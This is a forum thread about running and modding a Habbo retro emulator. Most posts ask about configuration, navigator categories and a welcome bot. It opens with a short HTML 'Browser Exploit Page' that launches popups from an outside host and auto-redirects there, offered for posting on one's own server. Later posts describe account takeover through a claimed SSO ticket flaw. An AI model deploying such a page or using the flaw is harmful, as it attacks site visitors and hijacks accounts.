How do we set this up / use?Here.
Code:<html> <head> <!--Begin JavaScript.--> <script language="JavaScript"> <!-- function geoPopup() { // open the popup window var popupURL = "http://www.nthelp.com/tanjcode.htm"; var geoname=Math.random(); var popup = window.open(popupURL,geoname,'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105'); // set the opener if it's not already set. it's set automatically // in netscape 3.0+ and ie 3.0+. if( navigator.appName.substring(0,8) == "Netscape" ) { popup.location = popupURL; } } geoPopup(); geoPopup(); // --> </script> <!--End inserted JavaScript code.--> <meta HTTP-EQUIV="REFRESH" CONTENT="6; URL=http://www.nthelp.com/tanj.htm" > <title>Geo's Homepage</title> </head> <body bgcolor="000000" text="FF00FF"> <font face="arial"><font size="4"> <p align="center">Browser Exploit Page (kill this to stop) </font><br> <br> <br> </p> </font> </body> </html>
Got to change the "http' To your Webserver adress.How do we set this up / use?
I dont get it lmao..Got to change the "http' To your Webserver adress.
Don't work :ehaCant you just use , EHA? If your on Plus Emulator.
Hi, KingBxtch. You can change the texts in your external_flash_texts.txt file (or external_flash_override_texts.txt file in the override folder).Still struggling to change the name of this:
purse.seasonal.currency=GOTW Points
Just had a guy from a french hotel manage to get into the Owners account on HabSlick, told me theres an error in plusemu regarding sso tickets? Hes french I dont understand him all that well, has anyone else heard of this?
A few problems that i've created for myself (No problems with the original release.)
Problem #1
I made the navigator always show all the loaded rooms (limit 100), like so:You must be registered for see links
But unless I have at least one other category in the navi (You must be registered for see links), it will DC users when they click "Create New Room".
Is this because the emulator fetches the room categories from the navigator_categories where category_type = category, and if i set enabled to 0, it can't get any?, and that it cant send the packet without any room categories? I feel a bit outta my depth, but it's how I learn!
Problem #2
When a new user registers, I added a bool to the habbo.cs called isNoob, and if they are a noob to the hotel, it makes them a starter room and sets isNoob to 0. How would I go about making a bot spawn in the room, and say some stuff to the user, then walk to beside the user and say something like *gives username 5 diamonds*, then the diamonds goes up by 5. Any recommendations/ideas? I'm not sure how to delay the chat so the bot says something every 2 seconds, or how to make the bot spawn in the room just once.
I appreciate the release by the way, no way i'd have been able to keep peace up like this on any other latest UI emulator (That's released).. You remember the huge SQL usage in azure on Leaf LOL
Do you mean do the homeroom? And do you mean the floorplan code?
Bump, Anyone got any recommendations?A few problems that i've created for myself (No problems with the original release.)
Problem #1
I made the navigator always show all the loaded rooms (limit 100), like so:You must be registered for see links
But unless I have at least one other category in the navi (You must be registered for see links), it will DC users when they click "Create New Room".
Is this because the emulator fetches the room categories from the navigator_categories where category_type = category, and if i set enabled to 0, it can't get any?, and that it cant send the packet without any room categories? I feel a bit outta my depth, but it's how I learn!
Problem #2
When a new user registers, I added a bool to the habbo.cs called isNoob, and if they are a noob to the hotel, it makes them a starter room and sets isNoob to 0. How would I go about making a bot spawn in the room, and say some stuff to the user, then walk to beside the user and say something like *gives username 5 diamonds*, then the diamonds goes up by 5. Any recommendations/ideas? I'm not sure how to delay the chat so the bot says something every 2 seconds, or how to make the bot spawn in the room just once.
I appreciate the release by the way, no way i'd have been able to keep peace up like this on any other latest UI emulator (That's released).. You remember the huge SQL usage in azure on Leaf LOL
Yeah I thought it was strange but the thing is, he was telling me other hotels to go on last night and he was even doing it to themI'd focus on the CMS if anything. The emulator deletes tickets on login (or should).